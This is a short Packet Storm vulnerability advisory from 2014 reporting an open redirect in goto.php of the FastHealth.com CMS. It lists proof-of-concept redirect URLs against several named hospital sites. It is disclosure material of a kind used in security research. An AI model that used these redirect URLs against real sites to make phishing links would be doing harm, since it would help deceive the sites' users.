FastHealth.com CMS Open Redirect

2014-11-04T00:00:00
ID PACKETSTORM:128971
Type packetstorm
Reporter Renzi
Modified 2014-11-04T00:00:00

Description

                                        
                                            `# URL Open Redirect on FastHealth.com CMS  
  
# Risk: Low  
  
# CWE number: CWE-601  
  
# Date: 04/11/2014  
  
# Author: Felipe " Renzi " Gabriel  
  
# Contact: renzi@linuxmail.org  
  
# Tested on Windows 8 pro ; Chrome 39.0.2171.42 beta-m  
  
# Vulnerable File: goto.php  
  
# Exploit:  
  
[+] http://www.*FastHealth.com/goto.php?url=http://site.com  
  
# PoC:  
[+] http://www.ahcmsfasthealth.com//goto.php?url=http://www.uol.com.br  
  
[+] http://www.drfasthealth.com//goto.php?url=http://www.uol.com.br  
  
[+] http://www.cameronfasthealth.com//goto.php?url=http://www.uol.com.br  
  
[+] http://www.scotlandfasthealth.com/goto.php?url=http://www.uol.com.br  
  
[+] http://www.whittierfasthealth.com/goto.php?url=http://www.uol.com.br  
  
[+] http://www.jamestownfasthealth.com/goto.php?url=http://www.uol.com.br  
  
# Note: Open redirect (CWE-601) allows phishing attack to be more effective.  
Redirection is commonly used within all web applications for various  
purposes.("Jason Lam" ~ Top 25 Series - Rank 23 - Open Redirect)  
  
# Reference: http://software-security.sans.org  
  
# Thank's  
`